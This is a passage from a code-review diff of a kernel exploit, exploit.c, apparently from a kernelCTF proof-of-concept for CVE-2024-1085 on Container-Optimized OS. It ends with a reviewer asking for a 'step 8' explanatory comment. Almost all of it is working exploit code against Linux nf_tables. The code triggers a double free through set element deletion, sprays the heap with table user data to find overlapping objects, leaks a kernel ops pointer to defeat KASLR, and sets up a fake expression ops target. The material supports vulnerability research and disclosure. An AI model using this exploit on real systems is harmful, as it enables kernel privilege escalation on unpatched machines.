pocs/linux/kernelctf/CVE-2024-1085_cos/exploit/cos-105-17412.226.43/exploit.c

```diff
@@ -0,0 +1,339 @@
+    msg_list[0] = del_setelem_msg(table, pipapo_set, NULL, 0, NULL, 0, 1);
+    msg_list[1] = del_table_msg(test_table);
+    msg_list[2] = del_setelem_msg(table, pipapo_set, NULL, 0, NULL, 0, 1);
+    send_msg_list(socket, msg_list, 3);
+    //Now we try to get the heap back and check if we success
+    struct nl_sock * socket2 = nl_socket_alloc();
+    if(nfnl_connect(socket2)<0){
+        printf("nfnl_connect fail!\n");
+        return 0;
+    }
+    nl_socket_modify_cb(socket2,NL_CB_MSG_IN, NL_CB_CUSTOM, nl_callback_get_table, NULL);
+    int try_num = 0;
+    char *table_name = malloc(0x100);
+    int a=0,b=0;
+    while(1){
+	printf("trying %d\n",try_num);
+	snprintf(table_name, 0x100, "table for test %d", try_num);
+	*(int *)pad = try_num;
+	new_table_with_udata(socket, table_name, pad, 0xd0);
+	int i;
+	for(i=0;i<try_num;i++){
+		snprintf(table_name, 0x100, "table for test %d", i);
+		get_table(socket2, table_name);
+		nl_recvmsgs_default(socket2);
+        	nl_recvmsgs_default(socket2);
+		printf("Get udata : %d\n", *(int *)table_udata);
+		if(*(int *)table_udata != i){
+		//It means we get two same object from the free list of kernel heap.
+			a = *(int *)table_udata;
+			b = i;
+			break;
+		}
+	}
+	if(b!=0)
+		break;
+	try_num++;
+	//sleep(0.2);
+    	
+    }
+    //Now, we free many object to avoid crash
+    char *tmp = malloc(0x100);
+    memset(tmp,0,0x100);
+    
+    for(i=0x80;i<0x180;i++){
+	snprintf(tmp, 0x100, "table_for_leak_%ld", i);
+        del_table(socket, tmp);
+    }
+    printf("We get it! A: %d B: %d \n", a, b);
+    sleep(2);
+    snprintf(tmp, 0x100, "table for test %d", a);
+    //free one of it.
+    del_table(socket, tmp);
+    sleep(2);
+    uint16_t bitmap_key = 0;
+    i=0;
+    
+    while(1){	
+	bitmap_key = i;
+	new_setelem_with_expr(socket, table, bitmap_set, pad, 0xb0, NULL, &bitmap_key, 2, NULL, 0);
+	snprintf(tmp, 0x100, "table for test %d", b);
+    	get_table(socket2, tmp);
+    	nl_recvmsgs_default(socket2);
+    	nl_recvmsgs_default(socket2);
+    	printf("Get ops : %llx\n",*(uint64_t *)(table_udata+0x28));
+	if(((*(uint64_t *)(table_udata+0x28)) & 0xfff ) == 0x760){
+    	    break;	
+	}
+	i++;
+    }
+    
+    //Save it. We will use it later.
+    char *setelem_data = malloc(0x100);
+    memcpy(setelem_data, table_udata, 0xd0);
+    kernel_off = *(uint64_t *)(table_udata+0x28) - 0xFFFFFFFF828C9760;
+    
+    //now we get ops, we try to add a small setelem and leak it. We will use this setelem as expr->ops target.
+    bitmap_key++;
+    new_setelem(socket, table, bitmap_set, pad, 0x60, NULL, &bitmap_key, 2, NULL, 0, 0);
+    
+    snprintf(tmp, 0x100, "table for test %d", b);
+    get_table(socket2, tmp);
+    nl_recvmsgs_default(socket2);
+    nl_recvmsgs_default(socket2);
+    printf("Get next setelem : %llx\n",*(uint64_t *)table_udata);
+    
+    uint64_t ops_addr = *(uint64_t *)table_udata;
+    //Free the small setelem, and fill it with our target expr->ops->dump and expr->ops->type
```

Comment:
Comment here that this is "step 8" based on the writeup. Also include what does it do:
> Delete set element `E`. Fill the heap memory of set element `E` through heap spraying.